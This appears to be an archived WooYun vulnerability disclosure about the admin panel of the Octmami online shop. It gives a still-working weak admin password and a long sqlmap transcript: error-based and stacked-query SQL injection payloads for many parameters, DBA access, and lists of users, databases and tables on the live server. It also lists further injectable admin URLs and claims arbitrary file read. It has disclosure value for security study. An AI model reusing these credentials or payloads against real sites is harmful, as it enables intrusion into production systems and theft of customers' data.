乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开
现在订货还少,如果以后多起来,那么用户信息量挺大的,泄漏出去不好,先做好防范吧!~~~
WooYun: 十月妈咪官方商城注入到内网探测(多漏洞打包提交) 从大牛提交的获知http://fair.st.octmami.com/admin.php存在弱口令,admin/123456,还没有修复,登录处做了防注入,但是登陆后,几乎所有的参数都可能是注入参数,列出来,随便测试几个
证明问题即可
http://fair.st.octmami.com/admin.php?r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1param[purchase]、param[type]、param[season]、param[cat_big]、param[cat_middle]、param[cat_small]、param[wave]、param[level]、param[scheme]、param[price_level_id]、param[style_sn]=1¶m[order]均存在注入
sqlmap identified the following injection points with a total of 1483 HTTP(s) requests:---Place: GETParameter: param[type] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=' AND (SELECT 6824 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (6824=6824) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hOro'='hOro¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]='; SELECT SLEEP(5)-- ¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[season] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=' AND (SELECT 4387 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (4387=4387) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlqf'='hlqf¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[order] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn AND (SELECT 2131 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (2131=2131) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)¶m[view]=&page=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn; SELECT SLEEP(5)-- ¶m[view]=&page=1Place: GETParameter: param[style_sn] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1' AND (SELECT 3798 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (3798=3798) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ayuk'='Ayuk¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[purchase] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=' AND (SELECT 1738 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (1738=1738)THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YEGd'='YEGd¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[cat_small] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=' AND (SELECT 2244 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (2244=2244) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TKzJ'='TKzJ¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[scheme] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=' AND (SELECT 2349 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (2349=2349) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rphb'='rphb¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[level] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=' AND (SELECT 1667 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (1667=1667) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tkFr'='tkFr¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[wave] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=' AND (SELECT 7673 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (7673=7673) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'puHK'='puHK¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[price_level_id] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=' AND (SELECT 6410 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (6410=6410) THEN 1 ELSE 0END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZVEf'='ZVEf¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[cat_big] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=' AND (SELECT 9041 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (9041=9041) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ErMR'='ErMR¶m[cat_middle]=¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1Place: GETParameter: param[cat_middle] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=order/default/index¶m[download]=0¶m[purchase]=¶m[type]=¶m[season]=¶m[cat_big]=¶m[cat_middle]=' AND (SELECT 9825 FROM(SELECT COUNT(*),CONCAT(0x71766a6771,(SELECT (CASE WHEN (9825=9825) THEN 1 ELSE 0 END)),0x716e627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUPBY x)a) AND 'SEbQ'='SEbQ¶m[cat_small]=¶m[wave]=¶m[level]=¶m[scheme]=¶m[price_level_id]=¶m[style_sn]=1¶m[order]=p.style_sn¶m[view]=&page=1---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: param[purchase], type: Single quoted string (default)[1] place: GET, parameter: param[type], type: Single quoted string[2] place: GET, parameter: param[season], type: Single quoted string[3] place: GET, parameter: param[cat_big], type: Single quoted string[4] place: GET, parameter: param[cat_middle], type: Single quoted string[5] place: GET, parameter: param[cat_small], type: Single quoted string[6] place: GET, parameter: param[wave], type: Single quoted string[7] place: GET, parameter: param[level], type: Single quoted string[8] place: GET, parameter: param[scheme], type: Single quoted string[9] place: GET, parameter: param[price_level_id], type: Single quoted string[10] place: GET, parameter: param[style_sn], type: Single quoted string[11] place: GET, parameter: param[order], type: Unescaped numeric[q] Quit> 0[02:26:35] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.38back-end DBMS: MySQL 5.0[02:27:14] [INFO] fetching current user[02:27:14] [INFO] retrieved: chen@%current user: 'chen@%'[02:27:14] [INFO] fetching current database[02:27:14] [INFO] retrieved: purchasecurrent database: 'purchase'[02:27:14] [INFO] testing if current user is DBA[02:27:14] [INFO] fetching current usercurrent user is DBA: Truedatabase management system users [9]:[*] ''@'localhost'[*] 'chen'@'%'[*] 'ecstore'@'localhost'[*] 'proftpd'@'%'[*] 'proftpd'@'localhost'[*] 'root'@'%'[*] 'root'@'127.0.0.1'[*] 'root'@'::1'[*] 'root'@'localhost'available databases [11]:[*] corp[*] ecstore[*] information_schema[*] mysql[*] octmami[*] performance_schema[*] purchase[*] server[*] test[*] youxi[*] zentaoweb application technology: Nginx, PHP 5.4.38back-end DBMS: MySQL >= 5.0.0Database: purchase+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| meet_order_items | 133260 || meet_product | 3293 || meet_color | 574 || meet_customer | 427 || meet_order | 338 || meet_order_log | 263 || meet_agent | 232 || meet_cat_small | 55 || meet_cat_big_small | 42 || meet_size | 40 || meet_cat_middle | 15 || meet_scheme | 10 || meet_wave | 8 || meet_admin_users | 7 || meet_cat_big | 5 || meet_level | 5 || meet_brand | 2 || meet_purchase | 2 || meet_season | 2 |+---------------------------------+---------+Database: mysql+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| help_relation | 1028 || help_topic | 508 || help_keyword | 464 || help_category | 39 || `user` | 11 || db | 4 || proxies_priv | 2 |+---------------------------------+---------+Database: octmami+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| sdb_b2c_comment_goods_point | 7833 || sdb_image_image | 3590 || sdb_ectools_regions | 3266 || sdb_b2c_member_comments | 2635 || sdb_operatorlog_normallogs | 1940 || sdb_base_kvstore | 1772 || sdb_pam_members | 1573 || sdb_b2c_goods_type_props_value | 1485 || sdb_b2c_products | 1269 || sdb_image_image_attach | 1215 || sdb_b2c_members | 991 || sdb_b2c_goods_spec_index | 943 || sdb_base_app_content | 762 || sdb_b2c_goods | 651 || sdb_ectools_analysis_logs | 559 || sdb_pam_log_desktop | 516 || sdb_desktop_tag_rel | 475 || sdb_dbeav_meta_value_text | 391 || sdb_base_cache_expires | 370 || sdb_dbeav_meta_value_longtext | 349 || oct_prize | 322 || sdb_b2c_goods_type_props | 290 || sdb_b2c_spec_values | 263 || sdb_desktop_menus | 258 || sdb_b2c_goods_keywords | 229 || sdb_base_setting | 213 || sdb_b2c_order_log | 211 || sdb_desktop_recycle | 163 || sdb_b2c_order_items | 158 || sdb_b2c_order_objects | 155 || sdb_site_widgets_instance | 136 || sdb_b2c_goods_rate | 93 || sdb_b2c_orders | 93 || sdb_b2c_type_brand | 89 || oct_comment_tmp | 85 || sdb_operatorlog_register | 79 || sdb_b2c_member_addrs | 76 || sdb_ectools_order_bills | 74 || sdb_b2c_goods_cat | 71 || sdb_ectools_payments | 71 || sdb_b2c_goods_type | 65 || sdb_site_widgets | 62 || sdb_content_article_bodys | 53 || sdb_b2c_delivery_items | 48 || sdb_b2c_sell_logs | 47 || sdb_base_apps | 47 || sdb_b2c_delivery | 42 || sdb_b2c_order_delivery | 42 || sdb_b2c_member_coupon | 41 || sdb_site_themes_file | 41 || sdb_b2c_goods_type_spec | 33 || sdb_b2c_cart_objects | 32 || sdb_b2c_brand | 31 || sdb_b2c_order_pmt | 30 || sdb_b2c_dlycorp | 26 || sdb_content_article_indexs | 25 || sdb_site_modules | 25 || sdb_b2c_specification | 21 || sdb_b2c_member_goods | 20 || sdb_site_themes_tmpl | 20 || sdb_desktop_tag | 18 || sdb_b2c_sales_rule_order | 17 || sdb_couponlog_order_coupon_ref | 16 || sdb_couponlog_order_coupon_user | 16 || sdb_wap_modules | 16 || sdb_b2c_goods_promotion_ref | 15 || sdb_dbeav_meta_register | 15 || sdb_wap_widgets | 12 || sdb_base_crontab | 10 || sdb_b2c_goods_virtual_cat | 8 || sdb_content_article_nodes | 8 || sdb_desktop_users | 7 || sdb_pam_account | 7 || sdb_site_seo | 7 || sdb_b2c_member_advance | 6 || sdb_desktop_hasrole | 6 || sdb_site_menus | 6 || sdb_dbeav_meta_value_varchar | 5 || sdb_desktop_roles | 5 || sdb_b2c_member_lv | 4 || sdb_wap_widgets_instance | 4 || oct_admin_group | 3 || oct_goods_ads | 3 || sdb_b2c_comment_goods_type | 3 || sdb_b2c_member_point | 3 || sdb_base_network | 3 || sdb_ectools_analysis | 3 || sdb_ectools_refunds | 3 || oct_brand_special | 2 || sdb_b2c_dlytype | 2 || sdb_b2c_member_systmpl | 2 || sdb_site_themes | 2 || sdb_starbuy_promotions_type | 2 || sdb_wap_themes_file | 2 || sdb_wap_themes_tmpl | 2 || oct_goods_seckill | 1 || sdb_b2c_coupons | 1 || sdb_ectools_currency | 1 || sdb_site_explorers | 1 || sdb_system_queue_mysql | 1 || sdb_wap_themes | 1 |+---------------------------------+---------+Database: server+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| manager_ftpusers | 2 |+---------------------------------+---------+Database: ecstore+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| sdb_image_image | 60376 || oct_product_price_snapshot | 24374 || sdb_b2c_comment_goods_point | 19512 || oct_cps_visit_log | 18913 || sdb_image_image_attach | 11649 || sdb_b2c_members | 7234 || sdb_b2c_member_comments | 7202 || oct_coupon_list | 6660 || sdb_b2c_order_log | 6377 || sdb_operatorlog_normallogs | 5756 || sdb_base_kvstore | 4792 || sdb_b2c_order_items | 4485 || sdb_b2c_order_objects | 4461 || sdb_b2c_products | 3495 || sdb_ectools_regions | 3266 || sdb_b2c_orders | 2926 || sdb_b2c_goods | 2534 || sdb_b2c_goods_promotion_ref | 2523 || oct_b2c_goods_spec_index | 2251 || sdb_pam_members | 1920 || goods_type_value2 | 1823 || sdb_b2c_member_coupon | 1655 || sdb_pam_log_desktop | 1462 || sdb_b2c_delivery_items | 1399 || goods_type_value | 1359 || sdb_b2c_goods_type_props_value | 1329 || sdb_b2c_order_pmt | 1289 || sdb_b2c_member_addrs | 1243 || oct_advertisement_items | 893 || sdb_b2c_order_delivery | 884 || sdb_b2c_delivery | 867 || sdb_base_app_content | 762 || oct_member_point | 761 || sdb_base_cache_expires | 649 || oct_search_words | 609 || sdb_desktop_tag_rel | 603 || oct_order_pmt | 599 || sdb_b2c_goods_rate | 569 || sdb_ectools_analysis_logs | 559 || sdb_b2c_goods_spec_index | 523 || sdb_dbeav_meta_value_text | 517 || sdb_apiactionlog_apilog | 493 || oct_member_wap_info | 468 || sdb_b2c_type_brand | 463 || sdb_dbeav_meta_value_longtext | 449 || sdb_desktop_recycle | 418 || sdb_ectools_order_bills | 414 || sdb_b2c_sell_logs | 394 || sdb_ectools_payments | 375 || sdb_b2c_cart_objects | 331 || oct_prize | 322 || sdb_base_setting | 317 || sdb_b2c_goods_type_props | 305 || sdb_b2c_brand | 297 || sdb_aftersales_return_product | 274 || sdb_b2c_goods_keywords | 267 || sdb_desktop_menus | 258 || sdb_b2c_spec_values | 234 || sdb_b2c_member_goods | 208 || sdb_site_widgets_instance | 203 || oct_recommend_loaction | 174 || oct_banner_info | 158 || oct_banner_location | 156 || oct_turn_table | 152 || oct_stores | 139 || sdb_site_widgets | 121 || oct_cps_log | 120 || sdb_b2c_member_point | 119 || goods_cat_3 | 114 || oct_coupon_order_item | 108 || oct_stores_image | 106 || sdb_system_queue_mysql | 105 || oct_special_product | 97 || goods_cat | 95 || goods_cat_name | 95 || sdb_b2c_goods_cat | 95 || oct_coupon_cate | 93 || oct_coupon_rule | 93 || sdb_site_themes_file | 93 || oct_feedback | 92 || oct_advertisement | 89 || sdb_b2c_order_cancel_reason | 85 || sdb_order_task_log | 82 || goods_cat_2 | 79 || sdb_operatorlog_register | 79 || sdb_b2c_goods_type | 77 || vw_goods_cat | 74 || sdb_content_article_bodys | 72 || oct_prompt_limit | 64 || sdb_search_associate | 60 || sdb_b2c_goods_type_spec | 57 || sdb_site_themes_tmpl | 57 || sdb_search_delta | 56 || oct_cps_put_type | 54 || oct_coupon_grant | 49 || sdb_base_apps | 47 || oct_prompt_activity | 46 || oct_recommend_dimension | 46 || oct_banner_dimension | 43 || sdb_b2c_reship_items | 40 || sdb_content_article_indexs | 40 || sdb_ectools_refunds | 39 || sdb_starbuy_special_goods | 35 || oct_recommend_comment_cat | 34 || sdb_b2c_member_systmpl | 32 || oct_cps_case | 30 || sdb_dbeav_meta_value_varchar | 30 || sdb_desktop_tag | 30 || oct_cps_valuation | 28 || sdb_b2c_sales_rule_order | 28 || sdb_b2c_dlycorp | 26 || oct_brand_special | 25 || sdb_site_modules | 25 || sdb_gift_ref | 24 || sdb_b2c_specification | 23 || sdb_desktop_hasrole | 22 || oct_verification_code | 20 || sdb_couponlog_order_coupon_ref | 19 || sdb_couponlog_order_coupon_user | 19 || oct_special_info | 18 || sdb_dbeav_meta_register | 18 || oct_recommend_comment_define | 17 || sdb_desktop_users | 17 || sdb_b2c_reship | 16 || sdb_wap_modules | 16 || oct_cps_put | 15 || sdb_dbeav_meta_value_int | 14 || sdb_pam_account | 14 || sdb_starbuy_special | 14 || oct_recommend_comment_info | 13 || sdb_b2c_coupons | 13 || sdb_b2c_sales_rule_goods | 13 || oct_sm_task_items | 12 || sdb_wap_widgets | 12 || sdb_b2c_goods_virtual_cat | 11 || sdb_b2c_member_advance | 11 || sdb_b2c_orders_recommend | 11 || oct_search_hot | 10 || oct_service_call | 10 || sdb_base_crontab | 10 || sdb_b2c_member_lv | 9 || sdb_content_article_nodes | 9 || sdb_site_menus | 9 || sdb_importexport_task | 7 || sdb_site_seo | 7 || oct_admin_group | 6 || oct_prompt_flash | 6 || oct_sm_queues | 6 || sdb_desktop_roles | 6 || oct_channel | 5 || oct_employees | 5 || oct_goods_seckill | 5 || oct_sm_users | 5 || sdb_b2c_goods_lv_price | 5 || sdb_wap_themes_file | 5 || sdb_wap_themes_tmpl | 5 || sdb_wap_widgets_instance | 5 || oct_member_weixin_bind | 4 || oct_sm_tasks | 4 || sdb_b2c_dlytype | 4 || oct_location | 3 || oct_sm_models | 3 || sdb_b2c_comment_goods_type | 3 || sdb_base_network | 3 || sdb_ectools_analysis | 3 || sdb_site_themes | 3 || sdb_starbuy_promotions_type | 3 || oct_agent | 2 || sdb_gift_cat | 2 || sdb_site_route_statics | 2 || oct_goods_ads | 1 || oct_sm_tags | 1 || sdb_b2c_goods_store_prompt | 1 || sdb_b2c_shop | 1 || sdb_desktop_filter | 1 || sdb_ectools_currency | 1 || sdb_site_explorers | 1 || sdb_site_link | 1 || sdb_starbuy_cancelorder | 1 || sdb_starbuy_count_member_buy | 1 || sdb_wap_themes | 1 |+---------------------------------+---------+Database: corp+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| oc_lost_card | 2040 || oc_present_exchange | 920 || oc_product | 894 || oc_shop | 526 || _bak_oc_shop | 408 || oc_shop2 | 404 || oc_yproduct | 136 || oc_yshop | 94 || oc_present_gallery | 61 || oc_wiki_info | 61 || oc_product_property | 60 || oc_module | 57 || oc_news | 49 || oc_jobs | 37 || oc_milestone | 25 || oc_present | 24 || oc_bbs | 23 || oc_wiki_sort | 20 || oc_member | 15 || oc_video | 13 || oc_company | 11 || oc_product_sort | 8 || oc_index_ad | 7 || oc_admin_user | 5 || oc_video_classify | 5 || oc_yproduct_sort | 5 || oc_book_classify | 4 || oc_index_icon | 4 || oc_magazine | 4 || oc_magazine_title | 4 || oc_uindex_ad | 4 || oc_dee | 2 || oc_join_table | 2 || oc_book | 1 || oc_contact_us | 1 || oc_sessions | 1 || oc_yproduct_property | 1 |+---------------------------------+---------+Database: youxi+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| _bak_oc_shop | 408 || oc_shop | 404 || oc_yproduct | 403 || oc_present_exchange | 309 || oc_product | 265 || oc_yshop | 94 || oc_wiki_info | 61 || oc_product_property | 59 || oc_present_gallery | 52 || oc_module | 51 || oc_jobs | 37 || oc_news | 34 || oc_milestone | 21 || oc_wiki_sort | 20 || oc_dee | 17 || oc_present | 17 || oc_bbs | 15 || oc_member | 15 || oc_video | 10 || oc_index_ad | 7 || oc_join_ab | 7 || oc_lost_card | 7 || oc_product_sort | 7 || oc_yproduct_sort | 5 || oc_admin_user | 4 || oc_uindex_ad | 3 || oc_join_table | 2 || oc_sessions | 2 || oc_contact_us | 1 || oc_sessions_data | 1 || oc_yproduct_property | 1 |+---------------------------------+---------+Database: zentao+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| zt_grouppriv | 1912 || zt_group | 11 |+---------------------------------+---------+
剩下的几个地方也同样存在注入
一、http://fair.st.octmami.com/admin.php?r=order/order/index¶m[purchase]=¶m[type]=¶m[department]=¶m[area]=¶m[leader]=¶m[order]=o.cost_item&page=1¶m[download]=0¶m[leader_name]=¶m[name]=param[purchase]、param[type]、param[department]、param[area]、param[leader]、param[order]、page=1¶m[download]、param[leader_name]、param[name]=这个参数也存在注入二、http://fair.st.octmami.com/admin.php?r=order/manage/manage&parm[name]=&parm[type]=&parm[purchase_id]=&parm[province]=&parm[area]=parm[name]、parm[type]、parm[purchase_id]、parm[province]、parm[area]=三、http://fair.st.octmami.com/admin.php?r=order/product/manage&pro[lsh]=&pro[kh]=&pro[pm]=&pro[catb]=&pro[cats]=&pro[sh]=&pro[jgd]=这几个同样存在注入pro[lsh]、pro[kh]、pro[pm]、pro[catb]、pro[cats]、pro[sh]、pro[jgd]=这几个同样存在注入四、http://fair.st.octmami.com/admin.php?r=order/order/detail&order_id=2015091554519899order_id存在注入五、http://fair.st.octmami.com/admin.php?r=order/default/dialogue&style_sn=161117010494style_sn存在注入六、http://fair.st.octmami.com/admin.php?r=order/manage/update&id=100001509id存在注入
可任意读取文件
夜深了,就不继续了,明天再看看其他的地方,网站有没有注入吧~~~~
如上
修复弱口令修复参数
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)